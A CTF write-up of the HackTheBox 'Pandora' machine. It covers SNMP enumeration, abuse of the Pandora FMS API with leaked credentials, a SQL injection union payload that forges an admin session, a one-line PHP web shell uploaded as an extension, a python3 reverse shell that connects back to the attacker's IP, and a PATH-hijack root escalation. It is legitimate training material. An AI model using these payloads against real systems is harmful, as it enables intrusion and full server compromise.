CTF-Writeups/HackTheBox/Pandora.md
2022-05-21 22:01:49 +05:00

8.8 KiB

HackTheBox-Pandora

NMAP

PORT   STATE SERVICE VERSION                                           
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))                 
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C
| http-methods:                                                        
|_  Supported Methods: GET HEAD POST OPTIONS 
|_http-server-header: Apache/2.4.41 (Ubuntu) 
|_http-title: Play | Landing    
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Visting the web page it seems like a template

And doesn't display anything interesting , running gobuster to fuzz for files and directories

It doesn't find anything as well , so I thought of doing a subdomain enumeration using wfuzz but that failed as well

So the web application didn't had anything interesting so I starting to scan for udp port and found snmp service to be running

Foothold

To enumerate snmp service there's a tool called snmp-walk so we can enumerate the running process ,interface and operating system through that

Keeping this tool running ,after 30 minutes I saw a process with credentials being passed on

Checking the apache2 vhosts file we can see that there's a subdomain pandora.panda.htb and it's being ran as user matt but only on localhost so we need to do portforwarding in order to access it through our browser

ssh -L 2222:127.0.0.1:80 daniel@panda.htb

Also to add domain names to /etc/hosts file

Navigating to that port through browser will present us a login page for Pandora

Going back to pandora's directory we can read some files out which there's a file named pandoradb_data.sql which has some queries , we see a query for admin user having his password hash

So trying to login with daniel on pnadora we get an error that we are only allowed to use api

Looking at the documention of api , we can use operations to get some data from pandora

https://pandorafms.com/manual/en/documentation/08_technical_reference/02_annex_externalapi

http://127.0.0.1:2222/pandora_console/include/api.php?op=get&op2=list_all_user&return_type=json&other=1&other_mode=url_encodeseparator|&apipass=1234&user=daniel&pass=HotelBabylon23

We can see that daniel is only allowed to read data from opearations , we can also get password hashes of users but those were not crackable

http://127.0.0.1:2222/pandora_console/include/api.php?op=get&op2=users&return_type=json&other=1&other_mode=url_encodeseparator|&apipass=1234&user=daniel&pass=HotelBabylon23

Looking for exploits I found remote code execution but that requires us to be authenticated and be an admin user

The second exploit was related to sqli in/include/chart_generator.php?session_id='

We can verify that there's a sqli by breaking the query with '

Now to check how many columns are there we can use ORDER BY

It doesn't give any mysql errors so we are good ,let's increase a number

And it gives an error when try to sort table by the fourth column which doesn't exists and it gives an sql error so there are 3 columns in the table from which it's fetching the data

Rabbit Hole

so let's using sqlmap to dump data , we can either just directly supply the url or save the request through burp , I find saving the request convenient for me so I'll go with that

And it's going to start dumping the database

Now here what we have fallen into a rabbit hole , by dumping the database we can find session id for users on pandora fms but those are only for matt and daniel , daniel only has access to api and matt is just a normal user

In PHPSESSSION replace the session

But we can't really do much being matt user

Privilege Escalation (Matt)

So going back to the url which was vulnerable to sqli we can elevate our privilegs to become admin user by following this article

https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained

Checking the columns of the table that what values it expects , we can look in the pandoradb.sql file that tsession_php has three columns

Our sqli payload would look like this

union+select+'randomshit_token','1638796349','id_usuario|s:5:"admin";'+--+

it's using select statement to allow a phpsesssion to be created against the admin user with the token we provided ,it could be anything

Running this it doesn't show any errors which means it got executed correctly and now replacing the PHPSESSION with our token

We are now logged in as admin user now all that is left is to use the rce exploit, I tried the exploit from exploit-db but it didn't worked

Then saw a php file upload exploit from a youtube video

So we can make a php file which will allow us to execute comamnds and make a zip archive of that php as we need to upload that as an extension

<?php system($_GET['cmd']); ?>

Then upload the archive file having the php file

After uploading the file , execute the file through http://127.0.0.1:2222/pandora_console/extensions/shell.php

We can get a reverse shell through python3

python3%20-c%20%27import%20socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.17%22,3333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(%22/bin/sh%22)%27

Stabilizing the shell with python3

Privilege Escalation (root)

Let's try to see if we have any privileges to run something as a root user sudo -l but it gives an error.

So this can be fixed by generating pair of ssh keys and logging.

But it seems we can't run anything as a root user ,so moving on for fidining SUID binaries

This binary seems suspicious as this isn't available by default, transferring the pandora_backup binary we can see that it's using tar to create an archive from /var/www/pandora/pandora_console/* in /root/.backup and the archive name pandora-backup.tar.gz

So this is vulnerable to PATH variable exploit , we can create a file named tar which will make bash a SUID binary and making it executable

Then exporting the PATH variable

export PATH=/tmp:$PATH

As we run the binary it will make bash a SUID

References